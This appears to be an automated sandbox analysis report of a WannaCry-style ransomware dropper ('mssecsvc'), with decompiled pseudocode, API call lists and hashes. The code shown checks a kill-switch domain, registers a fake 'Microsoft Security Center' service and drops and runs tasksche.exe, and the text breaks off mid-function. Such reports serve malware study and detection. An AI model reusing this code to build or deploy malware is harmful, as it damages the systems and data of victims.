                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.817896537.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.817892326.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817908524.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817913428.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817920780.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817951450.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817957264.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                          • String ID: mssecsvc2.0
                                                          • API String ID: 4274534310-3729025388
                                                          • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                          • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                          • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                          • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 71%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                          				CHAR* _v8;
                                                          				intOrPtr* _v24;
                                                          				intOrPtr _v28;
                                                          				struct _STARTUPINFOA _v96;
                                                          				int _v100;
                                                          				char** _v104;
                                                          				int _v108;
                                                          				void _v112;
                                                          				char** _v116;
                                                          				intOrPtr* _v120;
                                                          				intOrPtr _v124;
                                                          				void* _t27;
                                                          				intOrPtr _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t49;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t61;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x40a1a0);
                                                          				_push(0x409ba2);
                                                          				_push( *[fs:0x0]);
                                                          				 *[fs:0x0] = _t58;
                                                          				_v28 = _t58 - 0x68;
                                                          				_v8 = 0;
                                                          				__set_app_type(2);
                                                          				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                          				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                          				 *(__p__fmode()) =  *0x70f88c;
                                                          				 *(__p__commode()) =  *0x70f888;
                                                          				 *0x70f890 = _adjust_fdiv;
                                                          				_t27 = E00409BA1( *_adjust_fdiv);
                                                          				_t61 =  *0x431410; // 0x1
                                                          				if(_t61 == 0) {
                                                          					__setusermatherr(E00409B9E);
                                                          				}
                                                          				E00409B8C(_t27);
                                                          				_push(0x40b010);
                                                          				_push(0x40b00c);
                                                          				L00409B86();
                                                          				_v112 =  *0x70f884;
                                                          				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                          				_push(0x40b008);
                                                          				_push(0x40b000); // executed
                                                          				L00409B86(); // executed
                                                          				_t55 =  *_acmdln;
                                                          				_v120 = _t55;
                                                          				if( *_t55 != 0x22) {
                                                          					while( *_t55 > 0x20) {
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          						_t42 =  *_t55;
                                                          					} while (_t42 != 0 && _t42 != 0x22);
                                                          					if( *_t55 == 0x22) {
                                                          						L6:
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				}
                                                          				_t36 =  *_t55;
                                                          				if(_t36 != 0 && _t36 <= 0x20) {
                                                          					goto L6;
                                                          				}
                                                          				_v96.dwFlags = 0;
                                                          				GetStartupInfoA( &_v96);
                                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                                          					_t38 = 0xa;
                                                          				} else {
                                                          					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                          				}
                                                          				_push(_t38);
                                                          				_push(_t55);
                                                          				_push(0);
                                                          				_push(GetModuleHandleA(0));
                                                          				_t40 = E00408140();
                                                          				_v108 = _t40;
                                                          				exit(_t40);
                                                          				_t41 = _v24;
                                                          				_t49 =  *((intOrPtr*)( *_t41));
                                                          				_v124 = _t49;
                                                          				_push(_t41);
                                                          				_push(_t49);
                                                          				L00409B80();
                                                          				return _t41;
                                                          			}
























                                                          0x00409a19
                                                          0x00409a1b
                                                          0x00409a20
                                                          0x00409a2b
                                                          0x00409a2c
                                                          0x00409a39
                                                          0x00409a3e
                                                          0x00409a43
                                                          0x00409a4a
                                                          0x00409a51
                                                          0x00409a64
                                                          0x00409a72
                                                          0x00409a7b
                                                          0x00409a80
                                                          0x00409a85
                                                          0x00409a8b
                                                          0x00409a92
                                                          0x00409a98
                                                          0x00409a99
                                                          0x00409a9e
                                                          0x00409aa3
                                                          0x00409aa8
                                                          0x00409ab2
                                                          0x00409acb
                                                          0x00409ad1
                                                          0x00409ad6
                                                          0x00409adb
                                                          0x00409ae8
                                                          0x00409aea
                                                          0x00409af0
                                                          0x00409b2c
                                                          0x00409b31
                                                          0x00409b32
                                                          0x00409b32
                                                          0x00409af2
                                                          0x00409af2
                                                          0x00409af2
                                                          0x00409af3
                                                          0x00409af6
                                                          0x00409af8
                                                          0x00409b03
                                                          0x00409b05
                                                          0x00409b05
                                                          0x00409b06
                                                          0x00409b06
                                                          0x00409b03
                                                          0x00409b09
                                                          0x00409b0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b13
                                                          0x00409b1a
                                                          0x00409b24
                                                          0x00409b39
                                                          0x00409b26
                                                          0x00409b26
                                                          0x00409b26
                                                          0x00409b3a
                                                          0x00409b3b
                                                          0x00409b3c
                                                          0x00409b44
                                                          0x00409b45
                                                          0x00409b4a
                                                          0x00409b4e
                                                          0x00409b54
                                                          0x00409b59
                                                          0x00409b5b
                                                          0x00409b5e
                                                          0x00409b5f
                                                          0x00409b60
                                                          0x00409b67

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.817896537.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.817892326.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817908524.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817913428.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817920780.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817951450.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817957264.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                          • String ID:
                                                          • API String ID: 801014965-0
                                                          • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                          • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                          • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                          • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 92%
                                                          			E00408140() {
                                                          				char* _v1;
                                                          				char* _v3;
                                                          				char* _v7;
                                                          				char* _v11;
                                                          				char* _v15;
                                                          				char* _v19;
                                                          				char* _v23;
                                                          				void _v80;
                                                          				char _v100;
                                                          				char* _t12;
                                                          				void* _t13;
                                                          				void* _t27;
                                                          
                                                          				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                          				asm("movsb");
                                                          				_v23 = _t12;
                                                          				_v19 = _t12;
                                                          				_v15 = _t12;
                                                          				_v11 = _t12;
                                                          				_v7 = _t12;
                                                          				_v3 = _t12;
                                                          				_v1 = _t12;
                                                          				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                          				_t27 = _t13;
                                                          				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                          				InternetCloseHandle(_t27); // executed
                                                          				InternetCloseHandle(0);
                                                          				E00408090();
                                                          				return 0;
                                                          			}















                                                          0x00408155
                                                          0x00408157
                                                          0x00408158
                                                          0x0040815c
                                                          0x00408160
                                                          0x00408164
                                                          0x00408168
                                                          0x0040816c
                                                          0x00408177
                                                          0x0040817b
                                                          0x0040818e
                                                          0x00408194
                                                          0x004081a7
                                                          0x004081ab
                                                          0x004081ad
                                                          0x004081b9

                                                          APIs
                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                          • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                          • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                            • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                            • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                          Strings
                                                          • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.817896537.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.817892326.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817908524.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817913428.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817920780.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817951450.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817957264.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                          • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                          • API String ID: 774561529-2942426231
                                                          • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                          • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                          • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                          • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 100%
                                                          			E00407C40() {
                                                          				char _v260;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          
                                                          				sprintf( &_v260, "%s -m security", 0x70f760);
                                                          				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                          				if(_t15 == 0) {
                                                          					return 0;
                                                          				} else {
                                                          					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                          					if(_t17 != 0) {
                                                          						StartServiceA(_t17, 0, 0);
                                                          						CloseServiceHandle(_t17);
                                                          					}
                                                          					CloseServiceHandle(_t15);
                                                          					return 0;
                                                          				}
                                                          			}






                                                          0x00407c56
                                                          0x00407c6e
                                                          0x00407c72
                                                          0x00407cd3
                                                          0x00407c74
                                                          0x00407ca7
                                                          0x00407cab
                                                          0x00407cb2
                                                          0x00407cb9
                                                          0x00407cb9
                                                          0x00407cbc
                                                          0x00407cc9
                                                          0x00407cc9

                                                          APIs
                                                          • sprintf.MSVCRT ref: 00407C56
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                          • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F52FB10,00000000), ref: 00407C9B
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.817896537.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.817892326.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817908524.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817913428.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817920780.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817951450.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817957264.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                          • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                          • API String ID: 3340711343-4063779371
                                                          • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                          • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                          • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                          • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 35 407ce0-407cfb GetModuleHandleW 36 407d01-407d43 GetProcAddress * 4 35->36 37 407f08-407f14 35->37 36->37 38 407d49-407d4f 36->38 38->37 39 407d55-407d5b 38->39 39->37 40 407d61-407d63 39->40 40->37 41 407d69-407d7e FindResourceA 40->41 41->37 42 407d84-407d8e LoadResource 41->42 42->37 43 407d94-407da1 LockResource 42->43 43->37 44 407da7-407db3 SizeofResource 43->44 44->37 45 407db9-407e4e sprintf * 2 MoveFileExA 44->45 45->37 47 407e54-407ef0 45->47 47->37 51 407ef2-407f01 47->51 51->37
                                                          C-Code - Quality: 36%
                                                          			E00407CE0() {
                                                          				void _v259;
                                                          				char _v260;
                                                          				void _v519;
                                                          				char _v520;
                                                          				char _v572;
                                                          				short _v592;
                                                          				intOrPtr _v596;
                                                          				void* _v608;
                                                          				void _v636;
                                                          				char _v640;
                                                          				intOrPtr _v644;
                                                          				intOrPtr _v648;
                                                          				intOrPtr _v652;
                                                          				char _v656;
                                                          				intOrPtr _v692;
                                                          				intOrPtr _v700;
                                                          				_Unknown_base(*)()* _t36;
                                                          				void* _t38;
                                                          				void* _t39;
                                                          				intOrPtr _t64;
                                                          				struct HINSTANCE__* _t104;
                                                          				struct HRSRC__* _t105;
                                                          				void* _t107;
                                                          				void* _t108;
                                                          				long _t109;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t122;
                                                          
                                                          				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                          				if(_t104 != 0) {
                                                          					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                          					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                          					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                          					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                          					_t64 =  *0x431478; // 0x0
                                                          					 *0x43144c = _t36;
                                                          					if(_t64 != 0) {
                                                          						_t121 =  *0x431458; // 0x0
                                                          						if(_t121 != 0) {
                                                          							_t122 =  *0x431460; // 0x0
                                                          							if(_t122 != 0 && _t36 != 0) {
                                                          								_t105 = FindResourceA(0, 0x727, "R");
                                                          								if(_t105 != 0) {
                                                          									_t38 = LoadResource(0, _t105);
                                                          									if(_t38 != 0) {
                                                          										_t39 = LockResource(_t38);
                                                          										_v608 = _t39;
                                                          										if(_t39 != 0) {
                                                          											_t109 = SizeofResource(0, _t105);
                                                          											if(_t109 != 0) {
                                                          												_v520 = 0;
                                                          												memset( &_v519, 0, 0x40 << 2);
                                                          												asm("stosw");
                                                          												asm("stosb");
                                                          												_v260 = 0;
                                                          												memset( &_v259, 0, 0x40 << 2);
                                                          												asm("stosw");
                                                          												asm("stosb");
                                                          												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                          												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                          												MoveFileExA( &_v520,  &_v260, 1);
                                                          												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
                                                          												if(_t107 != 0xffffffff) {
                                                          													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
                                                          													 *0x43144c(_t107);
                                                          													_v652 = 0;
                                                          													_v648 = 0;
                                                          													_v644 = 0;
                                                          													memset( &_v636, 0, 0x10 << 2);
                                                          													asm("repne scasb");
                                                          													_v656 = 0;
                                                          													_t108 = " /i";
                                                          													asm("repne scasb");
                                                          													memcpy( &_v572 - 1, _t108, 0 << 2);
                                                          													_push( &_v656);
                                                          													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                          													_push( &_v640);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0x8000000);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push( &_v572);
                                                          													_push(0);
                                                          													_v640 = 0x44;
                                                          													_v592 = 0;
                                                          													_v596 = 0x81;
                                                          													if( *0x431478() != 0) {
                                                          														 *0x43144c(_v692);
                                                          														 *0x43144c(_v700);
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}






























                                                          0x00407cf5
                                                          0x00407cfb
                                                          0x00407d15
                                                          0x00407d22
                                                          0x00407d2f
                                                          0x00407d34
                                                          0x00407d36
                                                          0x00407d3c
                                                          0x00407d43
                                                          0x00407d49
                                                          0x00407d4f
                                                          0x00407d55
                                                          0x00407d5b
                                                          0x00407d7a
                                                          0x00407d7e
                                                          0x00407d86
                                                          0x00407d8e
                                                          0x00407d95
                                                          0x00407d9d
                                                          0x00407da1
                                                          0x00407daf
                                                          0x00407db3
                                                          0x00407dc4
                                                          0x00407dc8
                                                          0x00407dca
                                                          0x00407dcc
                                                          0x00407ddb
                                                          0x00407de2
                                                          0x00407def
                                                          0x00407df1
                                                          0x00407e01
                                                          0x00407e18
                                                          0x00407e2c
                                                          0x00407e49
                                                          0x00407e4e
                                                          0x00407e61
                                                          0x00407e68
                                                          0x00407e72
                                                          0x00407e7a
                                                          0x00407e82
                                                          0x00407e8b
                                                          0x00407e95
                                                          0x00407e9b
                                                          0x00407e9f
                                                          0x00407ea8
                                                          0x00407eb0
                                                          0x00407ebb
                                                          0x00407ebc
                                                          0x00407ec6
                                                          0x00407ec7
                                                          0x00407ec8
                                                          0x00407ec9
                                                          0x00407ece
                                                          0x00407ecf
                                                          0x00407ed0
                                                          0x00407ed1
                                                          0x00407ed2
                                                          0x00407ed3
                                                          0x00407edb
                                                          0x00407ee0
                                                          0x00407ef0
                                                          0x00407ef7
                                                          0x00407f02
                                                          0x00407f02
                                                          0x00407ef0
                                                          0x00407e4e
                                                          0x00407db3
                                                          0x00407da1
                                                          0x00407d8e
                                                          0x00407d7e
                                                          0x00407d5b
                                                          0x00407d4f
                                                          0x00407d43
                                                          0x00407f14

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F52FB10,?,00000000), ref: 00407CEF
                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                          • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                          • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                          • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                          • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                          • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                          • sprintf.MSVCRT ref: 00407E01
                                                          • sprintf.MSVCRT ref: 00407E18
                                                          • MoveFileExA.KERNEL32 ref: 00407E2C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.817896537.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.817892326.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817908524.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817913428.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817920780.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817951450.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817957264.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
                                                          • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                          • API String ID: 4072214828-1507730452
                                                          • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                          • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                          • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                          • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
                                                          				signed int _v5;
                                                          				signed char _v10;
                                                          				char _v11;
                                                          				char _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				intOrPtr* _v24;
                                                          				struct _FILETIME _v32;
                                                          				struct _FILETIME _v40;
                                                          				char _v44;
                                                          				unsigned int _v72;
                                                          				intOrPtr _v96;
                                                          				intOrPtr _v100;
                                                          				unsigned int _v108;
                                                          				unsigned int _v124;
                                                          				char _v384;
                                                          				char _v644;
                                                          				char _t142;
                                                          				char _t150;
                                                          				void* _t151;
                                                          				signed char _t156;
                                                          				long _t173;
                                                          				signed char _t185;
                                                          				signed char* _t190;
                                                          				signed char* _t194;
                                                          				intOrPtr* _t204;
                                                          				signed int _t207;
                                                          				signed int _t208;
                                                          				intOrPtr* _t209;
                                                          				unsigned int _t210;
                                                          				char _t212;
                                                          				signed char _t230;
                                                          				signed int _t234;
                                                          				signed char _t238;
                                                          				void* _t263;
                                                          				unsigned int _t264;
                                                          				signed int _t269;
                                                          				signed int _t270;
                                                          				signed int _t271;
                                                          				intOrPtr _t272;
                                                          				char* _t274;
                                                          				unsigned int _t276;
                                                          				signed int _t277;
                                                          				void* _t278;
                                                          				intOrPtr* _t280;
                                                          				void* _t281;
                                                          				intOrPtr _t282;
                                                          
                                                          				_t263 = __edx;
                                                          				_t213 = __ecx;
                                                          				_t272 = _a4;
                                                          				_t208 = _t207 | 0xffffffff;
                                                          				_t280 = __ecx;
                                                          				_v24 = __ecx;
                                                          				if(_t272 < _t208) {
                                                          					L61:
                                                          					return 0x10000;
                                                          				}
                                                          				_t131 =  *__ecx;
                                                          				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                          					goto L61;
                                                          				}
                                                          				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
                                                          					E00406A97(_t131);
                                                          					_pop(_t213);
                                                          				}
                                                          				 *(_t280 + 4) = _t208;
                                                          				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
                                                          					if(_t272 != _t208) {
                                                          						_t132 =  *_t280;
                                                          						if(_t272 >=  *( *_t280 + 0x10)) {
                                                          							L12:
                                                          							_t133 =  *_t280;
                                                          							if( *( *_t280 + 0x10) >= _t272) {
                                                          								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
                                                          								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
                                                          									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
                                                          									if(_t142 != 0) {
                                                          										L19:
                                                          										return 0x800;
                                                          									}
                                                          									_push(_v16);
                                                          									L00407700();
                                                          									_v12 = _t142;
                                                          									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
                                                          										_t281 = _a8;
                                                          										 *_t281 =  *( *_t280 + 0x10);
                                                          										strcpy( &_v644,  &_v384);
                                                          										_t209 = __imp___mbsstr;
                                                          										_t274 =  &_v644;
                                                          										while(1) {
                                                          											L21:
                                                          											_t150 =  *_t274;
                                                          											if(_t150 != 0 && _t274[1] == 0x3a) {
                                                          												break;
                                                          											}
                                                          											if(_t150 == 0x5c || _t150 == 0x2f) {
                                                          												_t274 =  &(_t274[1]);
                                                          												continue;
                                                          											} else {
                                                          												_t151 =  *_t209(_t274, "\\..\\");
                                                          												if(_t151 != 0) {
                                                          													L31:
                                                          													_t39 = _t151 + 4; // 0x4
                                                          													_t274 = _t39;
                                                          													continue;
                                                          												}
                                                          												_t151 =  *_t209(_t274, "\\../");
                                                          												if(_t151 != 0) {
                                                          													goto L31;
                                                          												}
                                                          												_t151 =  *_t209(_t274, "/../");
                                                          												if(_t151 != 0) {
                                                          													goto L31;
                                                          												}
                                                          												_t151 =  *_t209(_t274, "/..\\");
                                                          												if(_t151 == 0) {
                                                          													strcpy(_t281 + 4, _t274);
                                                          													_t264 = _v72;
                                                          													_a11 = _a11 & 0x00000000;
                                                          													_v5 = _v5 & 0x00000000;
                                                          													_t156 = _t264 >> 0x0000001e & 0x00000001;
                                                          													_t230 =  !(_t264 >> 0x17) & 0x00000001;
                                                          													_t276 = _v124 >> 8;
                                                          													_t210 = 1;
                                                          													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
                                                          														_a11 = _t264 >> 0x00000001 & 0x00000001;
                                                          														_t230 = _t264 & 0x00000001;
                                                          														_v5 = _t264 >> 0x00000002 & 0x00000001;
                                                          														_t156 = _t264 >> 0x00000004 & 0x00000001;
                                                          														_t264 = _t264 >> 0x00000005 & 0x00000001;
                                                          														_t210 = _t264;
                                                          													}
                                                          													_t277 = 0;
